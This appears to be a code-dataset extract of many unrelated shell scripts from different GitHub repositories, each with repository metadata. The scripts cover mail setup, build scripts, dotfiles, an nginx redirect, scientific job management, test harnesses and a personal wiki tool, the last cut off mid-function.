| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
[[ -z "$MAILHUB" ]] && MAILHUB='smtp.gmail.com:587'
cat >/etc/ssmtp/ssmtp.conf <<EOF
root=$EMAIL
mailhub=$MAILHUB
AuthUser=$EMAIL
AuthPass=$PASSWORD
UseTLS=YES
UseSTARTTLS=YES
hostname=localhost
FromLineOverride=YES
EOF
echo "root:$EMAIL:$MAILHUB" >/etc/ssmtp/revaliases
mkfifo /root/logpipe
socat TCP4-LISTEN:80,fork EXEC:/root/server &
echo 'Server started'
tail -f /root/logpipe
| true
|
2321921883aeff0be45d21b571a60155e6a9b178
|
Shell
|
ch-mach/CopierToPykota
|
/config.sh
|
UTF-8
| 1,009
| 2.578125
| 3
|
[] |
no_license
|
echo "Vergeben Sie eine ID für den Drucker:"
read ID
echo "Drucker aktiv (0/1)?"
read IS_ACTIVE
echo "IS_ACTIVE=$IS_ACTIVE" >> ./cfg/$ID.cfg
# usw
#IS_ACTIVE=1
#TYP=Canon7055
#IS_COLOUR=1
#IP=10.16.102.211:8000
#ADMIN_USER=7654321
#ADMIN_PWD=7654321
#DIR_NEWUSER=
#PARAM_NEWUSER=
#DIR_LIMIT=
#PARAM_LIMIT=
#DIR_DEL_USER=
#PARAM_DEL_USER=
#CMD_ADDUSER=curl -s -b <TMPDIR>/cookie_<ID>.txt -d "SecID=<NO>&Pswd=0&Pswd_Chk=1&TotalCheck=1&Flag=Exec_Data" "<ADMIN_USER>:<ADMIN_PWD>@<IP>/rps/csp.cgi"
#CMD_COOKIE=curl -c <TMPDIR>/cookie_<ID>.txt "<IP>/login" -d "uri=/&deptid=<ADMIN_USER>&password=<ADMIN_PWD>" && curl -s -b <TMPDIR>/cookie_<ID>.txt -c <TMPDIR>/cookie_<ID>.txt "<ADMIN_USER>:<ADMIN_PWD>@<IP>/rps/nativetop.cgi?RUIPNxBundle=&CorePGTAG=PGTAG_CONF_ENV_PAP" > /dev/null
# Die Werte geben die Position der entsprechenden Werte in der Auswertedatei des jeweiligen
# Kopierers an. Dabei ist folgende Reihenfolge zu beachten:
# KopienSW;DruckSW;LimitSW;KopienCl;DruckCl;LimitCl
#FELDER=1;0;2;0;0;0
| true
|
5e06a51adc9536da90a92379cae49f432d2eb2d6
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/nicotine-plus-git/PKGBUILD
|
UTF-8
| 874
| 2.578125
| 3
|
[] |
no_license
|
#! /bin/bash
# Maintainer: Rafael Cavalcanti <rc.cavalcanti at gmail dot com>
# Contributor: Jorge Barroso <jorge.barroso.11 at gmail dot com>
# Contributor: x-demon
pkgname=nicotine-plus-git
_gitname=nicotine-plus
pkgver=r2105.e91f0e9
pkgrel=3
pkgdesc="A fork of Nicotine, a graphical client for Soulseek."
arch=('i686' 'x86_64')
url="http://nicotine-plus.org"
license=('GPL')
depends=('pygtk' 'gtk2' 'mutagen')
makedepends=('git' 'python2')
optdepends=('miniupnpc: To enable UPnP support'
'python2-geoip: To enable geo-blocker'
'python2-notify: Notification support')
source=(git+https://github.com/Nicotine-Plus/${_gitname}.git)
sha512sums=('SKIP')
pkgver() {
cd "${srcdir}/$_gitname"
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
build() {
cd "$srcdir/$_gitname"
python2 setup.py install --root=$srcdir/pkg
}
package() {
mv ${srcdir}/pkg/* ${pkgdir}
}
| true
|
7136057cc4a471365c8e417679581b9dd3ee5cef
|
Shell
|
artcom/mobile-spark
|
/projects/DemoApp/android/build.sh
|
UTF-8
| 530
| 3.1875
| 3
|
[
"MIT",
"BSL-1.0"
] |
permissive
|
#! /bin/bash
SPARK_COMPONENT_DIR=`pwd`/..
if [[ "`uname -s`" == *CYGWIN* ]]; then
cd $(cygpath "$MOBILE_SPARK/")
else
cd $MOBILE_SPARK
fi
if [ -z "${ARM_TARGET:+1}" ]; then
export ARM_TARGET="armeabi-v7a"
echo "Using default ARM_TARGET $ARM_TARGET"
fi
if [ -z "${ANDROID_LEVEL:+1}" ]; then
export ANDROID_LEVEL="9"
echo "Using default ANDROID_LEVEL $ANDROID_LEVEL"
fi
SPARK_COMPONENT_NAME="DemoApp" SPARK_COMPONENT_DIR=$SPARK_COMPONENT_DIR android/build_project.sh $*
cd $SPARK_COMPONENT_DIR/android
| true
|
dcebadf683e938a5c2d45b32315d708194db440d
|
Shell
|
Grannik/menuNmcli
|
/menuNmcli.sh
|
UTF-8
| 11,375
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
E='echo -e'; # -e включить поддержку вывода Escape последовательностей
e='echo -en'; # -n не выводить перевод строки
trap "R;exit" 2 #
ESC=$( $e "\e")
TPUT(){ $e "\e[${1};${2}H" ;}
CLEAR(){ $e "\ec";}
# 25 возможно это
CIVIS(){ $e "\e[?25l";}
# это цвет текста списка перед курсором при значении 0 в переменной UNMARK(){ $e "\e[0m";}
MARK(){ $e "\e[44m";}
# 0 это цвет списка
UNMARK(){ $e "\e[0m";}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Эти строки задают цвет фона ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
R(){ CLEAR ;stty sane;CLEAR;}; # в этом варианте фон прозрачный
# R(){ CLEAR ;stty sane;$e "\ec\e[37;44m\e[J";}; # в этом варианте закрашивается весь фон терминала
# R(){ CLEAR ;stty sane;$e "\ec\e[0;45m\e[";}; # в этом варианте закрашивается только фон меню
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HEAD(){ for (( a=1; a<=39; a++ ))
do
TPUT $a 1
$E "\xE2\x94\x82 \xE2\x94\x82";
done
TPUT 3 2
$E "$(tput bold) Справочник WIFI утилиты nmcli$(tput sgr 0)";
TPUT 4 2
$E "$(tput setaf 2) network manager command-line interface $(tput sgr 0)";
TPUT 14 2
$E "$(tput setaf 2) Показать show $(tput sgr 0)";
TPUT 21 2
$E "$(tput setaf 2) Состояние status $(tput sgr 0)";
TPUT 25 2
$E "$(tput setaf 2) Cписок list $(tput sgr 0)";
TPUT 27 2
$E "$(tput setaf 2) Cвязь connection $(tput sgr 0)";
TPUT 33 2
$E "$(tput setaf 2) Псевдографический интерфейс $(tput sgr 0)";
TPUT 36 2
$E "$(tput setaf 2) Up \xE2\x86\x91 \xE2\x86\x93 Down Select Enter $(tput sgr 0)";
MARK;TPUT 1 2
$E " Программа написана на bash tput " ;UNMARK;}
i=0; CLEAR; CIVIS;NULL=/dev/null
# 32 это расстояние сверху и 48 это расстояние слева
FOOT(){ MARK;TPUT 39 2
$E " Grannik | 2021.07.05 ";UNMARK;}
# это управляет кнопками ввер/хвниз
i=0; CLEAR; CIVIS;NULL=/dev/null
#
ARROW(){ IFS= read -s -n1 key 2>/dev/null >&2
if [[ $key = $ESC ]];then
read -s -n1 key 2>/dev/null >&2;
if [[ $key = \[ ]]; then
read -s -n1 key 2>/dev/null >&2;
if [[ $key = A ]]; then echo up;fi
if [[ $key = B ]];then echo dn;fi
fi
fi
if [[ "$key" == "$($e \\x0A)" ]];then echo enter;fi;}
# 4 и далее это отступ сверху и 48 это расстояние слева
M0(){ TPUT 6 3; $e " Главный сайт ";}
M1(){ TPUT 7 3; $e " Pуководство ";}
M2(){ TPUT 8 3; $e " Запустить службу NetworkManager ";}
M3(){ TPUT 9 3; $e " Перезапустить службу NetworkManager ";}
M4(){ TPUT 10 3; $e " Показать состояние ";}
M5(){ TPUT 11 3; $e " Включить / выключить ";}
M6(){ TPUT 12 3; $e " Посмотреть имя хоста ";}
M7(){ TPUT 13 3; $e " Убедиться, что NetworkManager запущен ";}
M8(){ TPUT 15 3; $e " Показать информацию об устройствах ";}
M9(){ TPUT 16 3; $e " Показать информацию об устройстве ";}
M10(){ TPUT 17 3; $e " Показать информацию о сетевых интерфейсах ";}
M11(){ TPUT 18 3; $e " Показать таблицу маршрутизации ";}
M12(){ TPUT 19 3; $e " Показать список доступных подключений ";}
M13(){ TPUT 20 3; $e " Показать одно подключение ";}
M14(){ TPUT 22 3; $e " Увидеть статус всех сетевых интерфейсов ";}
M15(){ TPUT 23 3; $e " Cмотрим статус состояние интерфейсов ";}
M16(){ TPUT 24 3; $e " Проверяем статус NetworkManager ";}
M17(){ TPUT 26 3; $e " Просканировать ближайшие сети Wi-Fi ";}
M18(){ TPUT 28 3; $e " Узнать название интерфейса ";}
M19(){ TPUT 29 3; $e " Установить соединение с SSID ";}
M20(){ TPUT 30 3; $e " Переключение на другую SSID ";}
M21(){ TPUT 31 3; $e " Oбновить настройки ";}
M22(){ TPUT 32 3; $e " Поднять / отключить интерфейс ";}
M23(){ TPUT 34 3; $e " Псевдографический интерфейс на Whiptail ";}
M24(){ TPUT 35 3; $e " Показать команду терминала ";}
M25(){ TPUT 37 3; $e " EXIT ";}
# далее идет переменная LM=16 позволяющая бегать по списоку.
LM=25
MENU(){ for each in $(seq 0 $LM);do M${each};done;}
POS(){ if [[ $cur == up ]];then ((i--));fi
if [[ $cur == dn ]];then ((i++));fi
if [[ $i -lt 0 ]];then i=$LM;fi
if [[ $i -gt $LM ]];then i=0;fi;}
REFRESH(){ after=$((i+1)); before=$((i-1))
if [[ $before -lt 0 ]];then before=$LM;fi
if [[ $after -gt $LM ]];then after=0;fi
if [[ $j -lt $i ]];then UNMARK;M$before;else UNMARK;M$after;fi
if [[ $after -eq 0 ]] || [ $before -eq $LM ];then
UNMARK; M$before; M$after;fi;j=$i;UNMARK;M$before;M$after;}
INIT(){ R;HEAD;FOOT;MENU;}
SC(){ REFRESH;MARK;$S;$b;cur=`ARROW`;}
# Функция возвращения в меню
ES(){ MARK;$e " ENTER = main menu ";$b;read;INIT;};INIT
while [[ "$O" != " " ]]; do case $i in
# Здесь необходимо следить за двумя перепенными 0) и S=M0 Они должны совпадать между собой и переменной списка M0().
0) S=M0 ;SC;if [[ $cur == enter ]];then R;echo " https://developer.gnome.org/NetworkManager/stable/nmcli.html";ES;fi;;
1) S=M1 ;SC;if [[ $cur == enter ]];then R;man nmcli;ES;fi;;
2) S=M2 ;SC;if [[ $cur == enter ]];then R;echo "
sudo systemctl start NetworkManager
";ES;fi;;
3) S=M3 ;SC;if [[ $cur == enter ]];then R;echo " systemctl restart NetworkManager";ES;fi;;
4) S=M4 ;SC;if [[ $cur == enter ]];then R;echo "
Показать включен или выключен:
nmcli radio wifi
Ответ:
----------+----------
$(tput setaf 2) enabled $(tput sgr 0) | включено
$(tput setaf 1) disabled $(tput sgr 0) | выключено
";ES;fi;;
5) S=M5 ;SC;if [[ $cur == enter ]];then R;echo "
Включить:
nmcli radio wifi on
Выключить:
nmcli radio wifi off
";ES;fi;;
6) S=M6 ;SC;if [[ $cur == enter ]];then R;echo " nmcli general hostname";ES;fi;;
7) S=M7 ;SC;if [[ $cur == enter ]];then R;echo " nmcli general";ES;fi;;
8) S=M8 ;SC;if [[ $cur == enter ]];then R;echo "
nmcli device show
nmcli dev show
";ES;fi;;
9) S=M9 ;SC;if [[ $cur == enter ]];then R;echo " nmcli device show имя_устройства";ES;fi;;
10) S=M10;SC;if [[ $cur == enter ]];then R;echo " ip addr show";ES;fi;;
11) S=M11;SC;if [[ $cur == enter ]];then R;echo " ip route show match 0/0";ES;fi;;
12) S=M12;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli connection show
или
nmcli con show
или
nmcli c s
Посмотреть только активные соединения:
nmcli con show -a
";ES;fi;;
13) S=M13;SC;if [[ $cur == enter ]];then R;echo " nmcli connection show \"имя_соединения\"";ES;fi;;
14) S=M14;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli device status
или
nmcli dev status
Ответ:
-----------+------+-----------+-----------
DEVICE | TYPE | STATE | CONNECTION
$(tput setaf 2) устройство | тип | состояние | связь $(tput sgr 0)
$(tput setaf 2) connected $(tput sgr 0) | подключено
$(tput setaf 1) disconnected $(tput sgr 0) | не подключено
$(tput setaf 7) unavailable $(tput sgr 0) | недоступен
$(tput setaf 7) unmanaged $(tput sgr 0) | неуправляемый
";ES;fi;;
15) S=M15;SC;if [[ $cur == enter ]];then R;echo " nmcli general status ";ES;fi;;
16) S=M16;SC;if [[ $cur == enter ]];then R;echo " systemctl status NetworkManager ";ES;fi;;
17) S=M17;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli device wifi list
или
nmcli dev wifi list
";ES;fi;;
18) S=M18;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli connection
или
nmcli con
";ES;fi;;
19) S=M19 ;SC;if [[ $cur == enter ]];then R;echo "
Команда:
sudo nmcli dev wifi connect имя_сети
Команда с паролем:
sudo nmcli dev wifi connect имя_сети password \"пароль\"
В качестве альтернативы можно использовать параметр –ask
sudo nmcli --ask dev wifi connect имя_сети
Теперь система попросит вас ввести сетевой пароль, не делая его видимым.
";ES;fi;;
20) S=M20 ;SC;if [[ $cur == enter ]];then R;echo "
При подключении к одной сети, но надо использовать другое соединение,
Можно отключиться, переключив соединение на «Нет» .
Нужно будет указать SSID или, если несколько подключений с одним и тем же SSID, используйте UUID.
nmcli con down ssid/uuid
Чтобы подключиться к другому сохраненному соединению, просто передать опцию up в команде nmcli.
Убедитесь, что вы указали SSID или UUID новой сети, к которой хотите подключиться.
nmcli con up ssid/uuid
";ES;fi;;
21) S=M21;SC;if [[ $cur == enter ]];then R;echo " nmcli connection up static";ES;fi;;
22) S=M22;SC;if [[ $cur == enter ]];then R;echo "
Поднять интерфейс:
nmcli con up имя_интерфейса
Oтключить интерфейс:
nmcli con down имя_интерфейса
";ES;fi;;
23) S=M23;SC;if [[ $cur == enter ]];then R;nmtui;ES;fi;;
24) S=M24;SC;if [[ $cur == enter ]];then R;echo " nmtui ";ES;fi;;
25) S=M25;SC;if [[ $cur == enter ]];then R;exit 0;fi;;
esac;POS;done
| true
|
b22292a145951312b92584da84ba30c131604f9b
|
Shell
|
a-a-code/repo
|
/.bashrc
|
UTF-8
| 332
| 2.890625
| 3
|
[] |
no_license
|
# Interactive Check
[[ $- != *i* ]] && return
# Alaises
alias .='cd ..'
alias ..='cd ../..'
alias grep='grep --color=auto'
alias ls='ls -ahl --color=auto'
# Prompt
export PS1="\[\e[31m\]\A\[\e[m\]\[\e[31m\]>\[\e[m\] "
# History
set +o history
# Exports
export EDITOR=nvim
# LS after CD
function cd {
builtin cd "$@" && ls -F
}
| true
|
87c1f436a02600796fcb55d4d2a5a687a79b72d1
|
Shell
|
mzp/chef-repo
|
/bin/setup
|
UTF-8
| 105
| 2.734375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
for i in ~/home/dotfiles/*; do
echo rm .$(basename $i)
echo ln -s $i .$(basename $i);
done
| true
|
4c75cd50dc8b429fe0cd697ed346666d48a23ec2
|
Shell
|
cthit/misc
|
/irkk
|
UTF-8
| 2,105
| 4.0625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
CHOICE_FILE="$HOME/.irkk-choice"
choice=0
if [ "$1" == "-f" ] || [ "$1" == "--force" ]; then
echo -e "You've choosen to replace yor irkk choice.\n"
# Check if user already has screen running.
# Note that these "booleans" are inverted
hasScreen=$(screen -ls | grep -c irkk)
hasTmux=$(tmux list-sessions 2>/dev/null | grep -c irkk)
goahead="true"
if [ "$hasScreen" -gt "0" ] || [ "$hasTmux" -gt "0" ]; then
echo "Please note that you have a session running already."
echo -e "Do you want to replace it with a new choice?\n(note that your IRC connection will be disconnected)"
select answer in "Yes please" "Hell no!"; do
case $answer in
"Yes please" ) goahead="true"; break ;;
"Hell no!" ) goahead="false"; break;;
esac
done
fi
if [ "$goahead" == "true" ]; then
if [ "$hasScreen" -gt "0" ]; then
screen -S irkk -X quit
elif [ "$hasTmux" -gt "0" ]; then
tmux kill-session -t irkk
fi
[ ! -f $CHOICE_FILE ] || eval "rm $CHOICE_FILE"
fi
fi
# No previous choice
if [ ! -f $CHOICE_FILE ]; then
echo -e "(run 'irkk -f' if you were unsatisfied with your choice)\nDo you want to use:"
weechatScreen="WeeChat in Screen (recommended)"
irssiScreen="Irssi in Screen"
weechatTmux="WeeChat in tmux"
irssiTmux="Irssi in tmux"
select answer in "$weechatScreen" "$irssiScreen" "$weechatTmux" "$irssiTmux"; do
case $answer in
$weechatScreen ) eval "echo 1 >$CHOICE_FILE"; break ;;
$irssiScreen ) eval "echo 2 >$CHOICE_FILE"; break;;
$weechatTmux ) eval "echo 3 >$CHOICE_FILE"; break;;
$irssiTmux ) eval "echo 4 >$CHOICE_FILE"; break;;
esac
done
fi
choice=$(eval "cat $CHOICE_FILE")
case $choice in
1 ) screen -xRR irkk -q weechat-curses ;;
2 ) screen -xRR irkk -q irssi ;;
3 ) tmux attach-session -t irkk || tmux new-session -s irkk weechat-curses ;;
4 ) tmux attach-session -t irkk || tmux new-session -s irkk irssi ;;
esac
| true
|
7860edab436f67dcb67631645ae6f46357bca8f9
|
Shell
|
DNJha/CCPE-DockerBenchmarkCode
|
/Code/Case_2/linpack+ycruncher/out1.sh
|
UTF-8
| 405
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
j=1
while [ 1 ]
do
echo "----------------------------------" >> app/yc.txt
echo "Running YC started at: " >> app/yc.txt
echo ; date >> app/yc.txt
echo "YC Iteration: " $j >> app/yc.txt
echo "$(cd /y-cruncher\ v0.7.5.9481-static && ./y-cruncher bench 100m)" >> app/yc.txt
echo "Finished YC Iteration " $j >> app/yc.txt
echo ;date >> app/yc.txt
j=$((j+1))
done
| true
|
954bbe8e8560a9c82e4bb8d28617248a2f1a1117
|
Shell
|
IMSA-CMS/MCAutomation
|
/manageStepNewAddCopy.sh
|
UTF-8
| 3,611
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
#Go through all the lines in the file, write the step name and date
stepShort() {
echo "entered"$1
if [ "$1" == "genSimCrabConfig" ]
then
echo "entered2"
stepName="GENSIM"
elif [ "$1" == "recoCrabConfig" ]
then
stepName="RECO"
elif [ "$1" == "aodCrabConfig" ]
then
stepName="AOD"
elif [ "$1" == "miniAODSIM_crabConfig" ]
then
stepName="MINIAOD"
fi
}
jobCheck(){
#crab status $1
if [ $# -lt 1 ] ; then
echo Enter the directory of the crab job being checked as the sole argument
jobChecker="3"
fi
if crab status $1 | grep "Publication status:" | grep "100.0%"
then
echo "0"
jobChecker="0"
elif crab status -d $1 | grep -e "running.*)"
then
echo "2"
jobChecker="2"
elif crab status -d $1 | grep -e "idle"
then
echo "2"
jobChecker="2"
else
echo "1"
jobChecker="1"
fi
}
#particle=''
minMass=''
maxMass=''
lambda=''
#helicity=''
date=''
stepName=''
jobChecker=''
textFileDir="$PWD/textFiles/"
for file in $PWD/textFiles/*.txt
do
echo "fileName "$file
lineNum=-1
cat $file | while read line
#echo "Text read from file: $line"
do
lineNum=$(($lineNum+1))
i=0
for object in $line
do
obj[$i]=$object
echo ${obj[$i]}
i=$((i+1))
done
if [ "${obj[0]}" == " " ]
then
break 2
fi
if [ "${obj[0]}" == "300" ] || [ "${obj[0]}" == "800" ] || [ "${obj[0]}" == "1300" ] || [ "${obj[0]}" == "2000" ]
then
# particle="${obj[0]}"
minMass="${obj[0]}"
maxMass="${obj[1]}"
lambda="${obj[2]}"
# helicity="${obj[4]}"
date="${obj[3]}"
continue
fi
stepNameOld=${obj[0]}
stepShort "$stepNameOld"
echo "stepNameOld: "$stepNameOld
echo "stepName: "$stepName
crabProjectName=$PWD'/'$stepNameOld'/crab_projects/crab_'$stepName'_M'$minMass'to'$maxMass'_LED_L'$lambda'_13TeV_'$date
shortCrabProjectName='crab_'$stepName'_M'$minMass'to'$maxMass'_LED_L'$lambda'_13TeV_'$date
echo "our crab project name is " $crabProjectName
fullTextFile="$file"
#echo 'crabProjectName '$crabProjectName
#Check if we need to move on, unless it is the miniAODSIM, in which case it does not need to proceed
jobCheck "$crabProjectName"
if [ "$jobChecker" == "0" ]
then
if [ "$stepName" != 'miniAODSIM_CrabConfig' ]
then
echo "in here"
newLine=$(($lineNum+1))
obj[0]=" "
/uscms/home/avanderp/nobackup/CMSSW_9_3_6/src/GenStudy/Dimuon/test/moveOnCopy.sh $newLine "$stepNameOld" "$fullTextFile" "$minMass" "$maxMass" "$lambda" "$date"
fi
#If the job is completed on miniAOD, then this adds to the completeCounter
elif [ "$jobChecker" == "0" ]
then
echo jobChecker was 0
if [ "$stepName" == 'miniAODSIM_CrabConfig' ]
then
obj[0]=" "
echo $crabProjectName 'is completed!'
fi
#Check to resubmit jobs
elif [ "$jobChecker" == "1" ]
then
cur=$PWD
echo jobChecker was 1
echo $crabProjectName
/uscms/home/avanderp/nobackup/CMSSW_9_3_6/src/GenStudy/Dimuon/test/resubmitJobsNew.sh $stepNameOld $shortCrabProjectName
cd $crabProject
echo $crabProjectName ' is being resubmitted to step ' $stepName
cd $cur
obj[0]=" "
#If the job is still running, then this adds to the runningCounter
elif [ "$jobChecker" == "2" ]
then
echo jobChecker was 2
echo $crabProjectName ' is still runnning on step ' $stepName
obj[0]=" "
else
echo "Nothing Matched! :("
obj[0]=" "
fi
if [ "${obj[0]}" == "genSimCrabConfig" ] || [ "${obj[0]}" == "recoCrabConfig" ] || [ "${obj[0]}" == "aodCrabConfig" ] || [ "${obj[0]}" == "miniAODSIM_crabConfig" ]
then
obj[0]=" "
fi
done
done
| true
|
e23da96175becfbdc3c6f201a18213a42a098950
|
Shell
|
rubensayshi/bashtools
|
/gitgrepall.sh
|
UTF-8
| 111
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
DIRS=$(ls)
for DIR in $DIRS; do
>&2 echo $DIR
cd $DIR
git --no-pager log -p -S$1
cd ..
done
| true
|
70b5aa7274dfd0857598a9134ebf762d6e96af5c
|
Shell
|
jinyun1tang/netcdf-c
|
/dap4_test/test_meta.sh
|
UTF-8
| 1,575
| 3.234375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
if test "x$srcdir" = x ; then srcdir=`pwd`; fi
. ../test_common.sh
. ${srcdir}/d4test_common.sh
echo "test_meta.sh:"
set -e
computetestablefiles
CDL=
for f in ${F} ; do
STEM=`echo $f | cut -d. -f 1`
if test -e ${CDLTESTFILES}/${STEM}.cdl ; then
CDL="${CDL} ${STEM}"
else
echo "Not found: ${CDLTESTFILES}/${STEM}.cdl; ignored"
fi
done
if test "x${RESET}" = x1 ; then rm -fr ${BASELINE}/*.d4m ; fi
setresultdir results_test_meta
for f in ${F} ; do
echo "checking: $f"
if ! ${VG} ${execdir}/test_meta ${RAWTESTFILES}/${f}.dmr ${builddir}/results_test_meta/${f} ; then
failure "${execdir}/test_meta ${RAWTESTFILES}/${f}.dmr ${builddir}/results_test_meta/${f}"
fi
${NCDUMP} ${DUMPFLAGS} -h ${builddir}/results_test_meta/${f} > ${builddir}/results_test_meta/${f}.d4m
if test "x${TEST}" = x1 ; then
if ! diff -wBb ${BASELINE}/${f}.d4m ${builddir}/results_test_meta/${f}.d4m ; then
failure "diff -wBb ${BASELINE}/${f}.ncdump ${builddir}/results_test_meta/${f}.d4m"
fi
elif test "x${RESET}" = x1 ; then
echo "${f}:"
cp ${builddir}/results_test_meta/${f}.d4m ${BASELINE}/${f}.d4m
fi
done
if test "x${CDLDIFF}" = x1 ; then
for f in $CDL ; do
echo "diff -wBb ${CDLTESTFILES}/${f}.cdl ${builddir}/results_test_meta/${f}.d4m"
rm -f ${builddir}/tmp
cat ${CDLTESTFILES}/${f}.cdl \
cat >${builddir}/tmp
echo diff -wBbu ${builddir}/tmp ${builddir}/results_test_meta/${f}.d4m
if ! diff -wBbu ${builddir}/tmp ${builddir}/results_test_meta/${f}.d4m ; then
failure "${f}"
fi
done
fi
finish
| true
|
3f638255f0117688c15ddc6558fdb9150cec3189
|
Shell
|
aDENTinTIME/holberton-system_engineering-devops
|
/0x0B-web_server/3-redirection
|
UTF-8
| 382
| 2.546875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Installs nginx, and creates a redirect page
sudo apt-get update
sudo apt-get install Nginx -y
echo "Holberton School" | sudo tee /usr/share/nginx/html/index.html
sudo sed -i "s/^\slocation \/ {$/\tlocation \/redirect_me {\n\t\treturn 301 https:\/\/youtu.be\/Sagg08DrO5U;\n\t}\n\n\tlocation \/ {/" /etc/nginx/sites-available/default
sudo service nginx restart
| true
|
29af502eaa5fc5fb833ed238eda207e25ca68dcf
|
Shell
|
StefanCristian/argent-server
|
/app-misc/argent-mce/files/1.1/bin/argent-mce-start
|
UTF-8
| 523
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
# setup
myxinitrc="/usr/bin/argent-mce-session"
myuser="argentmce"
mcepid="/var/argentmce/.mcepid"
# make sure samba is started
[[ -f "/etc/init.d/samba" ]] && /etc/init.d/samba start &> /dev/null
# Kill previous instance running since
# /etc/init.d/xdm does not support PIDFILE for
# custom DISPLAYMANAGER
[[ -f "$mcepid" ]] && kill $(cat $mcepid) &> /dev/null
# spawn!
echo $$ > /var/run/argent-mce-start.pid
su - ${myuser} -c "source /etc/profile && /usr/bin/argent-mce-startx ${myxinitrc} &> /dev/null" &
| true
|
5666265d50a11b01b66b191dd83c31e7cd47492a
|
Shell
|
wuhp/lfs7.5
|
/build-temp-system/build-expect-2.sh
|
UTF-8
| 367
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
export SOURCE="expect5.45"
[ -d ${SOURCE} ] & rm -rf ${SOURCE}
tar -zxf ../sources/expect5.45.tar.gz
cd ${SOURCE}
cp -v configure{,.orig}
sed 's:/usr/local/bin:/bin:' configure.orig > configure
./configure --prefix=/tools \
--with-tcl=/tools/lib \
--with-tclinclude=/tools/include
make
#make test
make SCRIPTS="" install
| true
|
adb10f3714214e7ed82f131753078a0a6bb173bf
|
Shell
|
jjwilcoxson/envoy
|
/ci/build_container/build_recipes/googletest.sh
|
UTF-8
| 264
| 2.65625
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -e
VERSION=release-1.8.0
wget -O googletest-$VERSION.tar.gz https://github.com/google/googletest/archive/$VERSION.tar.gz
tar xf googletest-$VERSION.tar.gz
cd googletest-$VERSION
cmake -DCMAKE_INSTALL_PREFIX:PATH=$THIRDPARTY_BUILD .
make install
| true
|
a543c1d08c8856f755bc7790fce94f21811d14ae
|
Shell
|
Joe-Marchesini/CSI-230
|
/other/hostlookup.sh
|
UTF-8
| 438
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/bash
# file hostlookup.sh
# brief Takes file input with host names and checks if they are valid hosts.
# author joeseph.marchesini
# lab 6.2
# date 10/15/2020
usage()
{
echo "$0 usgae: [-f input filed]"
}
while getopts ":f:" options;
do
f=${OPTARG}
while read h;
do
out=$(host -W1 -t A $h)
if [ $? -eq 0 ];then
ip=$(echo $out | cut -d " " -f 4)
echo ${h},$ip
else
echo "${h}, not found"
fi
done < $f
done
| true
|
94c8861d8dfde224f0f60100f37d0bbe90afd962
|
Shell
|
forbesmyester/pernote
|
/pernote
|
UTF-8
| 7,311
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# POSSIBLE_INDEX_LOCATIONS=("$( cd "$(dirname "$0")" ; pwd -P )")
# if command -v basher; then
# echo bb
# POSSIBLE_INDEX_LOCATIONS+=("$(basher package-path forbesmyester/pernote)")
# echo bob
# fi
# for PP in "${POSSIBLE_INDEX_LOCATIONS[@]}";do
# echo ">> $PP"
# done
set -euo pipefail
IFS=$'\n\t'
show_help() {
echo "$0 Interact with personal wiki files"
echo ""
echo "Usage:"
echo ""
echo " $0 WIKI_NAME ACTION OPTION"
echo ""
echo "Examples:"
echo ""
echo " $0 WIKI_NAME new/n - Create an entry"
echo " $0 WIKI_NAME filename/f - Search for filename"
echo " $0 WIKI_NAME date/d [DATE_STR] - Open note for a day"
echo " $0 WIKI_NAME content/c - Search for content"
echo " $0 WIKI_NAME buildindex/b - Build index"
echo " $0 WIKI_NAME searchindex/s - Search the index"
echo " $0 WIKI_NAME git/g - Interact with git"
echo " $0 WIKI_NAME remotesync/r - Synchronize with GIT repository"
echo " $0 WIKI_NAME installdeps/i - Install dependencies"
echo ""
}
function new {
read -r -p "Please enter new name: " F
if [ ${#F} -gt 0 ]; then
F="${F}.md"
fi
echo "$F"
}
function get_wiki_path {
local OPTS
if [ ! -f "$HOME/.pernote" ]; then
echo "ERROR: No config file found." 1>&2
echo "" 1>&2
echo "Please run 'echo \"personal:/home/$USER/Documents/Personal Wiki\" > ~/.pernote'" 1>&2
exit 1
fi
if ! OPTS="$(grep "^$1" "$HOME/.pernote" | sed 's/^[^:]\+://')"; then
echo "Error: Input '${1}' resolves to no wikis" 1>&2
exit 1
fi
if [ "$(echo "$OPTS" | wc -l)" -gt 1 ]; then
echo "Error: Input '${1}' resolves to multiple wikis" 1>&2
exit 1
fi
echo "$OPTS"
}
function search_date {
local DIRECTORY
local DATE
DIRECTORY=$1
DATE=$(date -I)
if [ $# -gt 1 ]; then
if ! DATE="$(date -I -d "$2" 2>/dev/null)"; then
echo "Invalid date '${2}'" 1>&2
exit 1
fi
echo "${DATE}.md"
return 0
fi
if ! DATE=$(\
find "$DIRECTORY" -type f -name "*.md" -printf '%P\n' | \
grep "^diary/" | \
sed 's/\.md$//' | \
grep -v "^diary/${DATE}$" | \
sort -r |
sed "1 idiary/$DATE" | \
sed '$a<NEW>' | \
run_fzf "${@:2}" \
); then
exit 1
fi
if [[ "$DATE" == '<NEW>' ]]; then
echo "$DATE"
return 0
fi
echo "${DATE}.md"
}
function run_fzf {
if [ "$#" -gt 0 ]; then
fzf --ansi -q "$1"
else
